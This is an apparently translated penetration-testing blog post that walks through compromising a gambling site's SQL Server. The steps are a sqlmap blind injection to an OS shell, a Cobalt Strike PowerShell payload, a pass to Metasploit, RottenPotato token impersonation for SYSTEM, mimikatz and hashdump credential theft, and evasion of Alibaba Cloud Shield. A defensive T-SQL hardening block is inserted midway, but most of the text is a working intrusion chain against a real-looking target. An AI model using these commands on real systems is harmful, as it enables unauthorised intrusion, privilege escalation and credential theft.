Penetration practice - sqlserver empowerment
2022-07-04 03:43:00 【amingMM】
Technical points:
Cloud Shield (Yundun) evasion
Getting a CS / MSF session ("going online")
0x00 Prerequisites
Target: the login page of a BC (gambling) site.
Run sqlmap against it directly; the injection is a blind SQL injection:
sqlmap -u "http://127.0.0.1/Login/index" --form --batch --os-shell

This yields an os-shell.
0x01 Getting a CS session
Cobalt Strike
● Create a listener
Generate a PowerShell command payload.

Paste the command into the os-shell obtained above.

● Check privileges
The current shell runs only as nt service\mssqlserver, a very low-privileged account.
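An added defensive check (not code from the original post): the os-shell obtained in 0x00 and the nt service\mssqlserver shell seen in 0x01 rely on two conditions that a DBA can audit and remove. sqlmap's --os-shell on SQL Server runs commands through xp_cmdshell, re-enabling it with sp_configure when the application's login has sysadmin-level rights, and those commands then run under the SQL Server service account. The T-SQL below, run as an administrator, lists xp_cmdshell state, sysadmin members and the service account, then disables xp_cmdshell and shows the least-privilege change for the application login. The names webapp_login, AppDb and webapp_user are assumptions, not values from the write-up.

```sql
-- Added defensive audit, not part of the original post. Run as a SQL Server admin.

-- 1. Is xp_cmdshell enabled? sqlmap --os-shell on MSSQL depends on it.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- 2. Which logins hold sysadmin? A web application's login should not appear here:
--    a sysadmin login can re-enable xp_cmdshell by itself via sp_configure.
SELECT sp.name, sp.type_desc
FROM sys.server_principals AS sp
WHERE IS_SRVROLEMEMBER('sysadmin', sp.name) = 1
  AND sp.type IN ('S', 'U', 'G');   -- SQL logins, Windows users, Windows groups

-- 3. Which Windows account runs the engine? xp_cmdshell commands from sysadmin
--    callers run as this account (the write-up landed in nt service\mssqlserver).
--    Needs VIEW SERVER STATE.
SELECT servicename, service_account
FROM sys.dm_server_services;

-- 4. Hardening: turn xp_cmdshell off and hide the advanced options again.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 5. Least privilege for the application login (hypothetical names):
--    drop it from sysadmin and grant only data access inside its own database.
ALTER SERVER ROLE sysadmin DROP MEMBER webapp_login;
USE AppDb;
ALTER ROLE db_datareader ADD MEMBER webapp_user;
ALTER ROLE db_datawriter ADD MEMBER webapp_user;
```

Step 4 alone is not enough: as long as the application login stays in sysadmin, an injection can switch xp_cmdshell back on, so step 5 is the change that actually closes the path shown in 0x00. Re-running steps 1 and 2 afterwards confirms both conditions are gone.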
0x02 Privilege escalation

● Check installed patches
154 hotfixes are installed (systeminfo output):
Hotfix(s): 154 Hotfix(s) Installed.
[01]: KB2959936
[02]: KB3191564
[03]: KB2896496
[04]: KB2919355
[05]: KB2920189
[06]: KB2928120
[07]: KB2931358
[08]: KB2931366
[09]: KB2933826
[10]: KB2938066
[11]: KB2938772
[12]: KB2949621
[13]: KB2954879
[14]: KB2958262
[15]: KB2958263
[16]: KB2961072
[17]: KB2965500
[18]: KB2966407
[19]: KB2967917
[20]: KB2971203
[21]: KB2971850
[22]: KB2973351
[23]: KB2973448
[24]: KB2975061
[25]: KB2976627
[26]: KB2977629
[27]: KB2981580
[28]: KB2987107
[29]: KB2989647
[30]: KB2989930
[31]: KB2998527
[32]: KB3000850
[33]: KB3003057
[34]: KB3004545
[35]: KB3008242
[36]: KB3011780
[37]: KB3012702
[38]: KB3013172
[39]: KB3013410
[40]: KB3013538
[41]: KB3013769
[42]: KB3013791
[43]: KB3013816
[44]: KB3014442
[45]: KB3019978
[46]: KB3021674
[47]: KB3023266
[48]: KB3024751
[49]: KB3024755
[50]: KB3027209
[51]: KB3030947
[52]: KB3031044
[53]: KB3033446
[54]: KB3034348
[55]: KB3035126
[56]: KB3036612
[57]: KB3038002
[58]: KB3042058
[59]: KB3042085
[60]: KB3043812
[61]: KB3044374
[62]: KB3044673
[63]: KB3045634
[64]: KB3045685
[65]: KB3045717
[66]: KB3045719
[67]: KB3045755
[68]: KB3045999
[69]: KB3046017
[70]: KB3046737
[71]: KB3048043
[72]: KB3054169
[73]: KB3054203
[74]: KB3054256
[75]: KB3054464
[76]: KB3055323
[77]: KB3055343
[78]: KB3055642
[79]: KB3059317
[80]: KB3060681
[81]: KB3060793
[82]: KB3061512
[83]: KB3063843
[84]: KB3071756
[85]: KB3077715
[86]: KB3078405
[87]: KB3078676
[88]: KB3080149
[89]: KB3081320
[90]: KB3082089
[91]: KB3084135
[92]: KB3084905
[93]: KB3086255
[94]: KB3087137
[95]: KB3091297
[96]: KB3092601
[97]: KB3092627
[98]: KB3094486
[99]: KB3095701
[100]: KB3099834
[101]: KB3100473
[102]: KB3102429
[103]: KB3102939
[104]: KB3103616
[105]: KB3103696
[106]: KB3103709
[107]: KB3109103
[108]: KB3109976
[109]: KB3110329
[110]: KB3115224
[111]: KB3121261
[112]: KB3123245
[113]: KB3126041
[114]: KB3126434
[115]: KB3126587
[116]: KB3126593
[117]: KB3132080
[118]: KB3133043
[119]: KB3133690
[120]: KB3134179
[121]: KB3134815
[122]: KB3137728
[123]: KB3138602
[124]: KB3139164
[125]: KB3139398
[126]: KB3139914
[127]: KB3140219
[128]: KB3140234
[129]: KB3144850
[130]: KB3145384
[131]: KB3145432
[132]: KB3146604
[133]: KB3146723
[134]: KB3146751
[135]: KB3147071
[136]: KB3149157
[137]: KB3155784
[138]: KB3156059
[139]: KB3159398
[140]: KB3161949
[141]: KB3162343
[142]: KB3172614
[143]: KB3172729
[144]: KB3175024
[145]: KB3178539
[146]: KB3179574
[147]: KB3185319
[148]: KB4033428
[149]: KB4483187
[150]: KB4486105
[151]: KB4486107
[152]: KB5001403
[153]: KB5007154
[154]: KB5008263
Network Card(s): 1 NIC(s) Installed.
[01]: Red Hat VirtIO Ethernet Adapter
Connection Name: Ethernet
DHCP Enabled: Yes
Try MS16-075.
Check the AV: https://mrxn.net/avlist/ identifies Alibaba Cloud Shield.
0x03 Pivot to msf
● Create a new payload
Choose Foreign HTTP.

Use it in msf.

● CS: new session

Select the session and spawn it.

In msf, wait for the session to connect (note: it seems the session cannot be spawned when a domain prefix is used).

Privileges are still very low; in CS, use the file browser to upload RottenPotato (potato.exe).

● In the current session, start the privilege escalation:
cd C:\\Users\\Public
use incognito
execute -cH -f ./potato.exe
list_tokens -u
Copy the administrator token.
impersonate_token "<administrator token>"

SYSTEM privileges obtained.
0x04 Dump hashes
load mimikatz
creds_all

Or use msf's built-in module: run post/windows/gather/smart_hashdump

Log in directly.
0x05 Clean up traces